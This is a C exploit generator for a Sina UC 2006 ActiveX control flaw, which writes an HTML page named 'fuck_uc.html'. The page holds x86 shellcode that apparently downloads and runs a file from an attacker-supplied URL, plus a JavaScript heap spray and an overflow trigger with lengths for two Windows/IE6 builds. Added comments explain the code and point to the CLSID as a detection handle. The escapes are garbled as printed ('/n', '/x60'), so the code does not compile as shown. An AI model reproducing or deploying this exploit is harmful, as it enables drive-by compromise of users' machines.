Sina UC 2006 Activex SendChatRoomOpt Exploit

//
// Sina UC 2006 Activex SendChatRoomOpt Exploit
// Code by 云舒 & LuoLuo,ph4nt0morg
//

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <string.h>

/* Output stream for the generated HTML page. Opened by main() and read by
   PrintPayLoad() through this global rather than a parameter. */
FILE *fp = NULL;
/* Name of the file main() creates in the current directory; this file, not
   the source, is the artifact a scanner would see. */
char *file = "fuck_uc.html";
/* argv[1] from main(); appended NUL-terminated after sc[] in the page. */
char *url = NULL;

/*
 * Opaque x86 byte string that the page embeds as a JavaScript %u-escaped
 * string (see PrintPayLoad()). As printed here, "/x60" and friends are
 * literal slash sequences, not C byte escapes -- the page's backslashes
 * appear to have been lost in extraction, so this array is not the original
 * payload as shown. main() copies argv[1] (which it labels "download url")
 * NUL-terminated directly after these bytes; together with the trailing
 * ASCII "URLMON" that suggests a download-and-execute stager -- inferred,
 * not verified from this page. The CLSID string in `header` is the useful
 * detection handle, not these bytes.
 */
unsigned char sc[] =    
"/x60/x64/xa1/x30/x00/x00/x00/x8b/x40/x0c/x8b/x70/x1c/xad/x8b/x70"
"/x08/x81/xec/x00/x04/x00/x00/x8b/xec/x56/x68/x8e/x4e/x0e/xec/xe8"
"/xff/x00/x00/x00/x89/x45/x04/x56/x68/x98/xfe/x8a/x0e/xe8/xf1/x00"
"/x00/x00/x89/x45/x08/x56/x68/x25/xb0/xff/xc2/xe8/xe3/x00/x00/x00"
"/x89/x45/x0c/x56/x68/xef/xce/xe0/x60/xe8/xd5/x00/x00/x00/x89/x45"
"/x10/x56/x68/xc1/x79/xe5/xb8/xe8/xc7/x00/x00/x00/x89/x45/x14/x40"
"/x80/x38/xc3/x75/xfa/x89/x45/x18/xe9/x08/x01/x00/x00/x5e/x89/x75"
"/x24/x8b/x45/x04/x6a/x01/x59/x8b/x55/x18/x56/xe8/x8c/x00/x00/x00"
"/x50/x68/x36/x1a/x2f/x70/xe8/x98/x00/x00/x00/x89/x45/x1c/x8b/xc5"
"/x83/xc0/x50/x89/x45/x20/x68/xff/x00/x00/x00/x50/x8b/x45/x14/x6a"
"/x02/x59/x8b/x55/x18/xe8/x62/x00/x00/x00/x03/x45/x20/xc7/x00/x5c"
"/x7e/x2e/x65/xc7/x40/x04/x78/x65/x00/x00/xff/x75/x20/x8b/x45/x0c"
"/x6a/x01/x59/x8b/x55/x18/xe8/x41/x00/x00/x00/x6a/x07/x58/x03/x45"
"/x24/x33/xdb/x53/x53/xff/x75/x20/x50/x53/x8b/x45/x1c/x6a/x05/x59"
"/x8b/x55/x18/xe8/x24/x00/x00/x00/x6a/x00/xff/x75/x20/x8b/x45/x08"
"/x6a/x02/x59/x8b/x55/x18/xe8/x11/x00/x00/x00/x81/xc4/x00/x04/x00"
"/x00/x61/x81/xc4/xdc/x04/x00/x00/x5d/xc2/x24/x00/x41/x5b/x52/x03"
"/xe1/x03/xe1/x03/xe1/x03/xe1/x83/xec/x04/x5a/x53/x8b/xda/xe2/xf7"
"/x52/xff/xe0/x55/x8b/xec/x8b/x7d/x08/x8b/x5d/x0c/x56/x8b/x73/x3c"
"/x8b/x74/x1e/x78/x03/xf3/x56/x8b/x76/x20/x03/xf3/x33/xc9/x49/x41"
"/xad/x03/xc3/x56/x33/xf6/x0f/xbe/x10/x3a/xf2/x74/x08/xc1/xce/x0d"
"/x03/xf2/x40/xeb/xf1/x3b/xfe/x5e/x75/xe5/x5a/x8b/xeb/x8b/x5a/x24"
"/x03/xdd/x66/x8b/x0c/x4b/x8b/x5a/x1c/x03/xdd/x8b/x04/x8b/x03/xc5"
"/x5e/x5d/xc2/x08/x00/xe8/xf3/xfe/xff/xff/x55/x52/x4c/x4d/x4f/x4e"
"/x00";

/*
 * Static HTML/JavaScript preamble of the generated page. The leading HTML
 * comment records the targeted control (CLSID
 * 77AE4780-75E0-4CB0-A162-D1BBE3D50384, BROWSER2UC.dll) and the
 * SendChatRoomOpt signature; that CLSID is the handle for a kill-bit or
 * content-inspection rule. The last line opens `unescape(` and is left
 * unterminated on purpose: PrintPayLoad() emits the %uXXXX units and the
 * closing `");`. Escapes are garbled as printed (`/n` for newline, `/"` for
 * an embedded quote), so the literal does not compile as shown.
 */
char * header =
"<!--/n"
"clsid:77AE4780-75E0-4CB0-A162-D1BBE3D50384/n"
"C:/Program Files/sina/UC/ActiveX/BROWSER2UC.dll/n/n"

"Sub SendChatRoomOpt (/n"
"    ByVal astrVerion  As String ,/n"
"    ByVal astrUserID  As String ,/n"
"    ByVal asDataType  As Integer ,/n"
"    ByVal alTypeID  As Long/n"
")/n/n"
"ph4nt0m.org, Code By 云舒 & LuoLuo/n"
"!-->/n/n"
"<html>/n"
"<head>/n"
"<script language=/"javascript/">/n"
"var heapSprayToAddress = 0x0c0c0c0c;/n"
"var shellcode = unescape(/"%u9090/"+/"%u9090/"+ /n";

/*
 * JavaScript appended after the payload string: builds a slide of 0x9090
 * units sized so that `spraySlide + shellcode` fills heapBlockSize chunks up
 * to heapSprayToAddress (set in `header`), then allocates them in a loop.
 * The `memory` assignment inside the for loop is split across two source
 * lines and has lost its index expression, presumably to the page renderer;
 * escapes are garbled the same way as in `header`, so this does not compile
 * as shown.
 */
char * footer =
"/n"
"var heapBlockSize = 0x100000;/n"
"var payLoadSize = shellcode.length * 2;/n"
"var spraySlideSize = heapBlockSize - (payLoadSize+0x38);/n"
"var spraySlide = unescape(/"%u9090%u9090/");/n/n"
"spraySlide = getSpraySlide(spraySlide,spraySlideSize);/n"
"heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;/n"
"memory = new Array();/n/n"
"for (i=0;i<heapBlocks;i++)/n{/n"
"/t/tmemory
= spraySlide + shellcode;/n}/n"

"function getSpraySlide(spraySlide, spraySlideSize)/n{/n/t"
"while (spraySlide.length*2<spraySlideSize)/n/t"
"{/n/t/tspraySlide += spraySlide;/n/t}/n"
"/tspraySlide = spraySlide.substring(0,spraySlideSize/2);/n/treturn spraySlide;/n}/n/n";

// print unicode shellcode
/*
 * Write lpBuff to the global stream fp as a JavaScript string of %uXXXX
 * units: one 16-bit unit per two input bytes (host byte order, i.e. little
 * endian on x86), eight units per quoted line joined with `" +`, finished
 * with `");` to close the `unescape(` that `header` leaves open.
 *
 * lpBuff:   bytes to encode. They are read through an (unsigned short *)
 *           cast, which is an aliasing/alignment hazard on a char buffer --
 *           tolerated by x86 MSVC in practice, not portable C.
 * buffsize: byte count. When it is odd the last unit reads one byte past
 *           buffsize; main() passes a zero-filled 4096-byte buffer, so that
 *           byte is 0 as long as the buffer was not overrun.
 * fp is not checked here; main() opens it before calling. Escapes in the
 * literals are garbled as printed (`/"` for an embedded quote).
 */
void PrintPayLoad(char *lpBuff, int buffsize)
{
    int i;
    for(i=0;i < buffsize;i+=2)
    {
        /* every 16 bytes (8 units) start a new quoted line; lines after the
           first are joined to the previous one with `" +` */
        if((i%16)==0)
        {
            if(i!=0)
            {
                fprintf(fp, "%s", "/" +/n/"");
            }
            else
            {
                fprintf(fp, "%s", "/"");
            }
        }
        /* %%u escapes the percent; %0.4x pads the unit to four hex digits */
        fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
    }
    // print the shellcode after the header, then close it with " ) "
    fprintf(fp, "%s", "/");/n");  
}


/*
 * Entry point of the page generator.
 *
 * argv[1]: URL embedded after sc[]. Accepted if it contains "http://" or
 *          "ftp://" anywhere (strstr, not a prefix test) and is at least
 *          10 characters long.
 * argv[2]: "1" or "2" selects the overwrite length written into the trigger
 *          script (3133 / 3193, the two platforms in the usage text); any
 *          other value leaves len == 0 and a file is still written.
 *
 * Writes `header`, the %u-encoded payload, `footer` and the trigger script
 * to `file` in the current directory. Returns -1 on usage, URL or fopen
 * failure; the function ends without a return statement (C99 gives main an
 * implicit 0).
 *
 * Known defects, left as found: the URL is copied into the fixed 4096-byte
 * buffer with an unchecked memcpy, so an over-long argv[1] overruns the
 * generator's own stack; GetLastError() is queried after a CRT fopen()
 * failure, which reports through errno, so the printed code is likely
 * unrelated. As printed, the string literals are garbled ("/n", "/"") and
 * the "http://" literal is split across two lines, so this does not compile
 * as shown.
 */
int main( int argc, char *argv[] )
{
    if( argc != 3 )
    {
        printf( "/nUC ActiveX object exp,Code by 云舒 & LuoLuo,ph4nt0morg/n" );
        printf( "Usage: %s   <url>   <os>/n", argv[0] );
        printf( "      1     Windows XP SP2 Chinese version,IE 6/n" );
        printf( "      2     Windows 2003 standard SP1 Chinese Version, IE 6/n" );
        
        return -1;
    }
    
    char    seh[1024] = { 0 };
    int        os = atoi( argv[2] );   /* atoi: non-numeric input silently becomes 0 */
    int        len = 0;
    
    /* per-platform loop count for the trigger script; anything else stays 0 */
    if( os == 1 )
    {
        len = 3133;
    }
    else if( os == 2 )
    {
        len = 3193;
    }
    
    /* trigger script: the format literal is well under sizeof seh, so this
       sprintf cannot overflow for any int value of len */
    sprintf( seh , "var obj = new ActiveXObject(/"BROWSER2UC.BROWSERToUC/");/n/tvar arg1;/n/n<!-- Windows2003 standard SP1 + IE6 此处覆盖长度i为3193 -->/n<!-- Windows XP SP2 + IE6 此处覆盖长度i为3133 -->/n/nfor( var i = 0; i < %d; i ++ )/n{/targ1 += /"A/";/n}arg1=arg1 + unescape(/"%%0c%%0c%%0c%%0c/");/narg2=/"defaultV/";/narg3=1;/narg4=1;/nobj.SendChatRoomOpt(arg1 ,arg2 ,arg3 ,arg4);/n</script>/n</head>/n</html>", len );
    
    url = argv[1];
    /* substring test, not a prefix test: "x http://" passes too */
    if( (!strstr(url, "
http://") &&  !strstr(url, "ftp://")) || strlen(url) < 10)
    {
        printf("[-] Invalid url. Must start with 'http://','ftp://'/n");
        return -1;                
    }

    printf("[+] download url:%s/n", url);

    fp = fopen( file , "w" );
    if( fp == NULL )
    {
        /* fopen is CRT; its failure is in errno, not the Win32 last-error */
        printf( "Create file error: %d/n", GetLastError() );
        return -1;
    }
    fprintf( fp, "%s", header );
    fflush( fp );
    
    /* payload = sc[] bytes followed by the NUL-terminated URL; no bound
       check against sizeof buffer for strlen(url) */
    char    buffer[4096] = { 0 };
    int        sc_len = sizeof(sc)-1;
    memcpy(buffer, sc, sc_len);
    memcpy(buffer+sc_len, url, strlen(url));
  
    sc_len += strlen(url)+1;   /* +1 keeps the terminating NUL in the encoded string */
    PrintPayLoad((char *)buffer, sc_len);
    fflush( fp );
    
    fprintf( fp, "%s", footer );
    fprintf( fp, "%s", seh );
    
    fflush( fp );
    fclose( fp );

    printf( "Create done!please look %s/n", file );
}
 